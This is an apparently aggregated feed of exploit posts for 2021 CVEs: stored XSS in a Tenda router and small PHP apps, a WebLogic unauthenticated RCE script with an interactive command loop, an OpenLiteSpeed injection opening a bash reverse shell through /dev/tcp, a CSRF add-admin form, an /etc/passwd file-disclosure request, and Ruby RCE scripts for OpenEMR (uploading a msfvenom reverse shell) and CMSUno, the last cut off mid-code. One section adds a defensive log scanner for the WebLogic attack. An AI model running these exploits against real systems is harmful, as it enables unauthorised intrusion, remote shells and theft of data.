All posts published by ISHACK AI BOT
-
Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting
# Exploit Title: Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting
# Exploit Author: Chiragh Arora
# Hardware Model: Tenda AC5 AC1200
# Firmware version: V15.03.06.47_multi
# Tested on: Kali Linux
# CVE ID: CVE-2021-3186
# Date: 25.01.2021

##########################################################################

Steps to Reproduce -

- Navigate to the Tenda AC1200 gateway at 192.168.0.1
- Go to the WiFi Settings and click the “WiFi Name & Password” option there.
- Set the WiFi Name to "<script>alert(1)</script>"
- Click the “Save” button; as the page refreshes, you get an alert stating “1”.

Note: It doesn't matter which Network Name parameter (2.4 GHz or 5 GHz) you manipulate; the popup appears for both of them.
-
Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)
# Exploit Title: Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)
# Google Dork: inurl:"/console/login/LoginForm.jsp"
# Date: 01/26/2021
# Exploit Author: CHackA0101
# Vendor Homepage: https://www.oracle.com/security-alerts/cpuoct2020.html
# Version: Oracle WebLogic Server, version 12.2.1.0
# Tested on: Oracle WebLogic Server, version 12.2.1.0 (OS: Linux PDT 2017 x86_64 GNU/Linux)
# Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html
# CVE : CVE-2020-14882
# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2020-14882/README.md

#!/usr/bin/python3

import requests
import argparse
import http.client

http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'

parse = argparse.ArgumentParser()
parse.add_argument('-u', '--url', help='url')
args = parse.parse_args()

proxies = {'http': '127.0.0.1:8080'}
cmd_ = ""

# Headers
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15;rv:73.0)Gecko/20100101 Firefox/73.0",
    "Accept": "application/json,text/plain,*/*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip,deflate",
    "Upgrade-Insecure-Requests": "1",
    "Content-Type": "application/x-www-form-urlencoded",
    "Cache-Control": "max-age=0",
    "Connection": "close"
}

# Oracle WebLogic Server 12.2.1.0 - Unauthenticated RCE via python Exploitation:
url = args.url + """/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec();");"""
url_ = args.url + "/console/images/%252E%252E%252Fconsole.portal"
form_data_ = """_nfpb=false&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread=(weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe","/c", cmd} : new String[]{"/bin/sh","-c", cmd}; if (cmd != null) { String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\\A").next(); weblogic.servlet.internal.ServletResponseImpl res=(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req); res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().flush(); res.getWriter().write("");}executeThread.interrupt();");"""

#data_ = parse.urlencode(form_data_)

results1 = requests.get(url, headers=headers)

if results1.status_code == 200:
    print("(Load Headers...)\n")
    print("(Data urlencode...)\n")
    print("(Execute exploit...)\n")
    print("(CHackA0101-GNU/Linux)$ Successful Exploitation.\n")
    while True:
        cmd_test = input("(CHackA0101GNU/Linux)$ ")
        if cmd_test == "exit":
            break
        else:
            try:
                cmd_ = cmd_test
                headers = {
                    'cmd': cmd_,
                    'Content-Type': 'application/x-www-form-urlencoded',
                    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36',
                    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
                    'Connection': 'close',
                    'Accept-Encoding': 'gzip,deflate',
                    'Content-Length': '1244',
                    'Content-Type': 'application/x-www-form-urlencoded'
                }
                results_ = requests.post(url_, data=form_data_, headers=headers, stream=True).text
                print(results_)
            except:
                pass
else:
    print("(CHackA0101-GNU/Linux)$ Fail.\n")
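A defender-side check for this class of request, added here as an example that is not part of CHackA0101's exploit and not Oracle tooling. The request above works because the console's /console/images/ static prefix is served without authentication and the double-encoded %252E%252E%252F segment only becomes ../ after the second decode, so a single-decode filter lets it reach console.portal. The scanner below double-decodes the path from access-log lines, flags paths that begin under /console/images/ but normalise out of it, and flags a handle= parameter naming ShellSession. The log lines are constructed samples and the function names are my own.

```python
import re
from posixpath import normpath
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (combined-log style); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Jan/2021:10:00:01 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 512
10.0.0.6 - - [26/Jan/2021:10:00:02 +0000] "GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22x%22) HTTP/1.0" 200 1024
10.0.0.7 - - [26/Jan/2021:10:00:03 +0000] "POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.0" 200 2048
10.0.0.8 - - [26/Jan/2021:10:00:04 +0000] "GET /console/images/logo.png HTTP/1.1" 200 3000
"""

# Request line inside a combined-log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Static prefix the console serves without authentication
UNAUTH_PREFIX = '/console/images/'


def double_decode(text):
    """Percent-decode twice: the traversal in CVE-2020-14882 is double-encoded
    (%252E -> %2E -> .), so a single decode still looks like a harmless file name."""
    return unquote(unquote(text))


def classify(target):
    """Return the reasons a request target looks like CVE-2020-14882 abuse
    (empty list if none)."""
    reasons = []
    parts = urlsplit(target)
    raw_path = parts.path
    decoded_path = double_decode(raw_path)

    # Path starts under the unauthenticated static prefix but normalises out of it
    if decoded_path.startswith(UNAUTH_PREFIX) and not normpath(decoded_path).startswith(UNAUTH_PREFIX):
        reasons.append('traversal out of ' + UNAUTH_PREFIX)

    # A double-encoded percent sign plus a dot segment is itself a strong signal
    if '%25' in raw_path.lower() and '..' in decoded_path:
        reasons.append('double-encoded dot segment')

    # The handle= parameter carrying a ShellSession constructor is the RCE gadget
    query = double_decode(parts.query)
    if 'handle=' in query and 'ShellSession' in query:
        reasons.append('handle= parameter invokes ShellSession')
    return reasons


def scan_log(text):
    """Scan log text; return (line number, method, target, reasons) for each hit."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        reasons = classify(match.group('target'))
        if reasons:
            hits.append((lineno, match.group('method'), match.group('target'), reasons))
    return hits


if __name__ == '__main__':
    for lineno, method, target, reasons in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {method} {target}")
        for reason in reasons:
            print(f"    - {reason}")
```

Run against the constructed log it reports lines 2 and 3 only. Detection is a stopgap: the fix is the October 2020 Critical Patch Update linked in the advisory header, and the administration console should not be reachable from untrusted networks in the first place.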
-
Simple College Website 1.0 - 'full' Stored Cross Site Scripting
# Exploit Title: Simple College Website 1.0 - 'full' Stored Cross Site Scripting
# Exploit Author: Marco Catalano (@stunn4)
# Date: 2021-01-25
# Vendor Homepage: https://www.sourcecodester.com/php/7772/simple-college-website-using-php-and-mysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=7772&title=Simple+College+Website+using++PHP%2FMySQLi+with+Source+Code
# Affected Version: 1.0
# Vulnerable parameter: "full" (POST method)
# Tested on: Linux, PHP/7.4.11

Explanation:

The source of the "/admin_pages/admission.php" file defines the following lines of code:

if (isset($_POST['add']) && !empty($_POST['full'])) {
    $full = $_POST['full'];
    $query = mysqli_query($conn, "UPDATE `contents` SET `full_contents`='$full' WHERE `id`='2'");
    if ($query) {
        echo "<b style='color:white;'>Page changed..!</b>";
    } else if (!$query) {
        echo "<b style='color:white;'>Page is not changed..!</b>";
    }
}

which allows an authenticated administrator to modify the source code of the page. Every change is then reflected, and the user input is not properly sanitized; this leads to cross site scripting attacks. An attacker may try to gain access to the admin panel using an authentication bypass through an SQL injection exploit.

Proof Of Concept:

The attacker is logged into the administrator panel and modifies the source code of the admission.php page to inject JavaScript code as follows:

POST /admin_pages/admission.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/admin_pages/admission.php
Cookie: wp-settings-time-1=1611158502; PHPSESSID=ujhslpm8cg18eeb1jd7nempudj
Upgrade-Insecure-Requests: 1

full=<script>alert("xss+PoC+by+stunn4")%3b</script>&add=Update+Contents

The XSS payload is stored in the database, so a victim browsing http://127.0.0.1/admission.php executes the XSS payload.
-
Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) (1)
# Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated)
# Date: 26/1/2021
# Exploit Author: cmOs - SunCSR
# Vendor Homepage: https://openlitespeed.org/
# Software Link: https://openlitespeed.org/kb/install-from-binary/
# Version: 1.7.8
# Tested on Windows 10

Step 1: Log in to the dashboard using the Administrator account.
Step 2: Access Server Configuration > External App > Command
Step 3: Set the "Start By Server *" value to "Yes (Through CGI Daemon)"
Step 4: Inject the payload "fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'" into the "Command" value
Step 5: Graceful Restart

[POC]

POST /view/confMgr.php HTTP/1.1
Host: target:7080
Connection: close
Content-Length: 579
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://target:7080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target:7080/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: LSUI37FE0C43B84483E0=b8e3df9c8a36fc631dd688accca82aee; litespeed_admin_lang=english; LSID37FE0C43B84483E0=W7zzfuEznhk%3D; LSPA37FE0C43B84483E0=excYiZbpUS4%3D

name=lsphp&address=uds%3A%2F%2Ftmp%2Flshttpd%2Flsphp.sock&note=&maxConns=10&env=PHP_LSAPI_CHILDREN%3D10%0D%0ALSAPI_AVOID_FORK%3D200M&initTimeout=60&retryTimeout=0&persistConn=1&pcKeepAliveTimeout=&respBuffer=1&autoStart=2&path=fcgi-bin%2Flsphp5%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fbash+-c+'bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.17.52%2F1234+0%3E%261'&backlog=100&instances=0&extUser=&extGroup=&umask=&runOnStartUp=3&extMaxIdleTime=&priority=0&memSoftLimit=2047M&memHardLimit=2047M&procSoftLimit=1400&procHardLimit=1500&a=s&m=serv&p=ext&t=A_EXT_LSAPI&r=lsphp&tk=0.08677800+1611561077
-
STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)
# Exploit Title: STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)
# Date: 19.01.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.stvs.ch

STVS ProVision 5.9.10 Cross-Site Request Forgery (Add Admin)

Vendor: STVS SA
Product web page: http://www.stvs.ch
Platform: Ruby
Affected version: 5.9.10 (build 2885-3a8219a)
                  5.9.9 (build 2882-7c3b787)
                  5.9.7 (build 2871-a450938)
                  5.9.1 (build 2771-1bbed11)
                  5.9.0 (build 2701-6123026)
                  5.8.6 (build 2557-84726f7)
                  5.7
                  5.6
                  5.5

Summary: STVS is a Swiss company specializing in development of software for digital video recording for surveillance cameras as well as the establishment of powerful and user-friendly IP video surveillance networks.

Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Tested on: Ubuntu 14.04.3
           nginx/1.12.1
           nginx/1.4.6
           nginx/1.1.19
           nginx/0.7.65
           nginx/0.3.61

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5625
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5625.php

19.01.2021

--

<html>
  <body>
    <form action="http://192.168.1.17/users/create" method="POST">
      <input type="hidden" name="login" value="testingus" />
      <input type="hidden" name="password" value="testingus" />
      <input type="hidden" name="confirm_password" value="testingus" />
      <input type="hidden" name="email" value="test@test.tld" />
      <input type="hidden" name="role_id" value="1" />
      <input type="hidden" name="never_expire" value="on" />
      <input type="hidden" name="disabled_acc" value="false" />
      <input type="submit" value="Forge request" />
    </form>
  </body>
</html>
-
STVS ProVision 5.9.10 - File Disclosure (Authenticated)
# Exploit Title: STVS ProVision 5.9.10 - File Disclosure (Authenticated)
# Date: 19.01.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.stvs.ch

STVS ProVision 5.9.10 (archive.rb) Authenticated File Disclosure Vulnerability

Vendor: STVS SA
Product web page: http://www.stvs.ch
Platform: Ruby
Affected version: 5.9.10 (build 2885-3a8219a)
                  5.9.9 (build 2882-7c3b787)
                  5.9.7 (build 2871-a450938)
                  5.9.1 (build 2771-1bbed11)
                  5.9.0 (build 2701-6123026)
                  5.8.6 (build 2557-84726f7)
                  5.7
                  5.6
                  5.5

Summary: STVS is a Swiss company specializing in development of software for digital video recording for surveillance cameras as well as the establishment of powerful and user-friendly IP video surveillance networks.

Desc: The NVR software ProVision suffers from an authenticated arbitrary file disclosure vulnerability. Input passed through the files parameter in the archive download script (archive.rb) is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files.

Tested on: Ubuntu 14.04.3
           nginx/1.12.1
           nginx/1.4.6
           nginx/1.1.19
           nginx/0.7.65
           nginx/0.3.61

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5623
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5623.php

19.01.2021

--

#1 LFI Prober (FP):
-------------------

GET /archive/download?files=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: 192.168.1.17
Authorization: Digest username="admin", realm="ProVision", nonce="MjAyMS0wMS0xOSAwMDowNjo0NTo2OTMwMTE6NDk2MmVkNzM2OWIxNzMzNzRjZDc3YzY0NjM3MmNhNz", uri="/archive/download", algorithm=MD5, response="aceffbb0a121570f98a9f4678470a588", opaque="3c837ec895bd5fedcdad8674184de82e", qop=auth, nc=000001ca, cnonce="ebed759486b87a80"
Accept: application/json, text/javascript, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Origin: http://192.168.1.17
Referer: http://192.168.1.17/archive
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: last_stream=1; __flash__info=
Connection: close

HTTP/1.1 500 Not Found
Server: nginx/1.4.6 (Ubuntu)
Date: Mon, 18 Jan 2021 23:23:30 GMT
Content-Type: text/html
Content-Length: 2727
Connection: close

<h1>`Archive` application problem</h1><h2>Archive::Controllers::FileDownload.GET</h2><h3>TypeError can't convert nil into String:</h3>
<ul>
<li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `initialize'</li>
<li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `new'</li>
<li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `get'</li>
<li>(eval):27:in `send'</li>
<li>(eval):27:in `service'</li>
<li>/usr/local/lib/ruby/site_ruby/1.8/ext/security.rb:79:in `service'</li>
<li>/usr/local/lib/ruby/site_ruby/1.8/ext/forward.rb:54:in `run'</li>
<li>/usr/local/lib/ruby/gems/1.8/gems/camping-1.5.180/lib/camping/reloader.rb:117:in `run'</li>
<li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:53:in `process'</li>
<li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:52:in `synchronize'</li>
<li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:52:in `process'</li>
<li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:626:in `process_client'</li>
<li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:625:in `each'</li>
<li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:625:in `process_client'</li>
<li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `run'</li>
<li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `initialize'</li>
<li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `new'</li>
<li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `run'</li>
<li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `initialize'</li>
<li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `new'</li>
<li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `run'</li>
<li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:282:in `run'</li>
<li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:281:in `each'</li>
<li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:281:in `run'</li>
<li>/usr/local/bin/provision_server:69:in `cloaker_'</li>
<li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:149:in `call'</li>
<li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:149:in `listener'</li>
<li>/usr/local/bin/provision_server:63:in `cloaker_'</li>
<li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:50:in `call'</li>
<li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:50:in `initialize'</li>
<li>/usr/local/bin/provision_server:62:in `new'</li>
<li>/usr/local/bin/provision_server:62</li>
</ul>

#2 LFI Prober (Verified):
-------------------------

$ curl "http://192.168.1.17/archive//download/%2Fetc%2Fpasswd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
provision:x:999:107::/srv/provision/provision:/bin/bash
stvs:x:1000:100::/home/stvs:/bin/bash
usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false
ntp:x:104:108::/home/ntp:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
statd:x:107:65534::/var/lib/nfs:/bin/false
--
Errno::ENOENT
No such file or directory - /var/www/index.html:
/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `initialize'
/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `new'
/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `get'
-
OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2)
# Title: OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2)
# Exploit Author: Alexandre ZANNI
# Date: 2020-07-16
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
# Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile
# Version: < 5.0.1 (Patch 4)
# Tested on: Ubuntu 18.04, OpenEMR Version 5.0.1.3
# References: https://www.exploit-db.com/exploits/48515

#!/usr/bin/env ruby

require 'httpclient'
require 'docopt'

shell_name = 'shell4.php'
user = 'openemr_admin'
password = 'xxxxxx'
payload = 'php/reverse_php'
lhost = '10.10.15.201'
lport = 8888

doc = <<~DOCOPT
  OpenEMR <= 5.0.1 - (Authenticated) Remote Code Execution

  Usage:
    #{__FILE__} manual --root-url <url> --shell <filename> --user <username> --password <password> [--debug]
    #{__FILE__} semi-auto --root-url <url> --user <username> --password <password> --payload <payload> --lhost <host> --lport <port> [--debug]
    #{__FILE__} auto --root-url <url> --user <username> --password <password> --lhost <host> --lport <port> [--debug]
    #{__FILE__} -H | --help

  Options:
    -r <url>, --root-url <url>            Root URL (base path) including HTTP scheme, port and root folder
    -s <filename>, --shell <filename>     Filename of the PHP reverse shell payload
    -u <username>, --user <username>      Username of the admin
    -p <password>, --password <password>  Password of the admin
    -m <payload>, --payload <payload>     Metasploit PHP payload
    -h <host>, --lhost <host>             Reverse shell local host
    -t <port>, --lport <port>             Reverse shell local port
    --debug                               Display arguments
    -H, --help                            Show this screen

  Examples:
    #{__FILE__} manual -r http://example.org/openemr -s myRevShell.php -u admin -p pass123
    #{__FILE__} semi-auto -r http://example.org:8080/openemr -u admin_emr -p qwerty2020 -m 'php/reverse_php' -h 10.0.0.2 -t 8888
    #{__FILE__} auto -r https://example.org:4443 -u admin_usr -p rock5 -h 192.168.0.2 -t 9999
DOCOPT

begin
  args = Docopt.docopt(doc)
  pp args if args['--debug']

  if args['manual']
    shell_name = File.basename(args['--shell'])
    shell_path = args['--shell']
  else
    shell_name = "tmp#{rand(1000)}.php"
    shell_path = shell_name
  end

  if args['semi-auto']
    payload = args['--payload']
  else
    payload = 'php/reverse_php'
  end

  # Authentication data
  uri_1 = URI("#{args['--root-url']}/interface/main/main_screen.php?auth=login&site=default")
  data_1 = {
    'new_login_session_management' => '1',
    'authProvider' => 'Default',
    'authUser' => args['--user'],
    'clearPass' => args['--password'],
    'languageChoice' => '1'
  }

  # Reverse shell data
  unless args['manual']
    puts "[+] Generating the reverse shell payload: #{shell_name}"
    %x(msfvenom -p #{payload} LHOST=#{args['--lhost']} LPORT=#{args['--lport']} -f raw > #{shell_name})
  end
  data_2 = {
    'site' => 'default',
    'mode' => 'save',
    'docid' => shell_name,
    'content' => File.read(shell_path)
  }
  uri_2 = URI("#{args['--root-url']}/portal/import_template.php?site=default")
  uri_3 = URI("#{args['--root-url']}/portal/#{shell_name}")

  clnt = HTTPClient.new

  puts '[+] Authenticating'
  clnt.post(uri_1, data_1)

  puts '[+] Uploading the reverse shell'
  clnt.post(uri_2, data_2)

  puts "[+] Executing the reverse shell: #{args['--root-url']}/portal/#{shell_name}"
  clnt.get(uri_3)
rescue Docopt::Exit => e
  puts e.message
end
-
EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting
# Exploit Title: EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting
# Exploit Author: Mahendra Purbia
# Vendor Homepage: http://egavilanmedia.com
# Software Link: https://egavilanmedia.com/crud-operation-with-php-mysql-bootstrap-and-dompdf/
# Version: 1.0
# Tested on: Windows 10

Vulnerable Parameters: Full Name

Steps to reproduce:
1. Go to http://localhost/PHPCRUD/
2. Click on "add new record" and fill in the details (in the first name field use: "><svg onload=alert(1)// )
3. Reload the page and you will see that the XSS payload executed. It's a stored XSS.
-
CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)
# Exploit Title: CMSUno 1.6.2 - 'lang/user' Remote Code Execution (Authenticated)
# Google Dorks:
#   inurl:uno/central.php
#   inurl:uno/config.php
#   inurl:uno.php intitle:"CMSUno - Login"
# Exploit Author: noraj (Alexandre ZANNI) for SEC-IT (https://secit.fr) https://www.exploit-db.com/?author=10066
# Vendor Homepage: https://www.boiteasite.fr/cmsuno.html
# Software Link: https://github.com/boiteasite/cmsuno/archive/1.6.2.tar.gz
# Version: 1.6.1, 1.6.2
# Tested on: docker image: php:7.4-apache (Debian buster)
# CVE : CVE-2020-25557 & CVE-2020-25538

# Vulnerabilities
## Discoverer: Fatih Çelik
## Discoverer website: https://fatihhcelik.blogspot.com
## Vulnerability 1:
## Title: CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated)
## CVE: CVE-2020-25557
## References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution.html
## Vulnerability 2:
## Title: CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)
## CVE: CVE-2020-25538
## References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution_30.html

#!/usr/bin/env ruby

require 'httpclient'
require 'docopt'

# username = 'cmsuno'
# password = '654321'
# root_url = 'http://localhost:5000/'
# command = 'pwd'

doc = <<~DOCOPT
  CMSUno 1.6.1 <= 1.6.2 - Remote Code Execution (Authenticated)

  Usage:
    #{__FILE__} -r <url> -c <cmd> [-u <username>] [-p <password>] [-t <tech>] [--debug]
    #{__FILE__} -H | --help

  Options:
    -r <url>, --root-url <url>        Root URL (base path) including HTTP scheme, port and root folder
    -u <username>, --user <username>  user name (if not default: cmsuno)
    -p <password>, --pass <password>  User password (if not default: 654321)
    -c <cmd>, --command <cmd>         Command to execute on the target
    -t <tech>, --technique <tech>     Technique: exploiting 'user' param (default, with output) or 'lang' param (blind)
    --debug                           Display arguments
    -h, --help                        Show this screen

  Examples:
    #{__FILE__} -r http://example.org -c id
    #{__FILE__} -r https://example.org:5000/cmsuno -c 'touch hackproof' -u john -p admin1234 -t lang
DOCOPT

# Get anti-CSRF token
def get_unox(client, auth_status)
  print '[*] Fetching anti-CSRF token: '
  res = client.get(LOGIN_URL)
  case auth_status
  when false
    regexp = /name="unox" value="([a-f0-9]{32}?)"/
  when true
    regexp = /Unox='([a-f0-9]{32}?)'/
  end
  token = regexp.match(res.body).captures[0].chomp
  puts token
  return token
end

def login(client, user, pass)
  data = {
    'unox' => get_unox(client, false),
    'user' => user,
    'pass' => pass,
  }
  puts '[*] Logging in'
  res = client.post(LOGIN_URL, data)
  return res.body
end

def exploit(client, user, pass, cmd, tech)
  payload = "#{user}\";$pass='#{pass}';system('#{cmd}');?>// "
  case tech
  when 'user'
    data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=#{user}&pass0=#{pass}&user=#{payload}&pass=#{pass}&lang=en"
  when 'lang'
    data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=&pass0=&user=&pass=&lang=#{payload}"
  else
    raise 'Wrong exploitation technique argument value'
  end
  headers = { 'X-Requested-With' => 'XMLHttpRequest' }
  #client.proxy = 'http://localhost:8080'
  puts "[*] Starting exploitation, using '#{tech}' param technique"
  client.post(VULNERABLE_URL, data, headers)
  # Login again to trigger uno/password.php
  clnt2 = HTTPClient.new
  return login(clnt2, user, pass).lines[..-2].join
end

begin
  args = Docopt.docopt(doc)
  pp args if args['--debug']

  username = args['--user'] || 'cmsuno'
  password = args['--pass'] || '654321'
  technique = args['--technique'] || 'user'
  LOGIN_URL = "#{args['--root-url']}/uno.php"
  VULNERABLE_URL = "#{args['--root-url']}/uno/central.php"

  clnt = HTTPClient.new
  login(clnt, username, password)
  output = exploit(clnt, username, password, args['--command'], technique)
  print '[*] Command output:'
  case technique
  when 'user'
    puts "\n#{output}"
  when 'lang'
    puts ' blind RCE, no output with this exploitation technique'
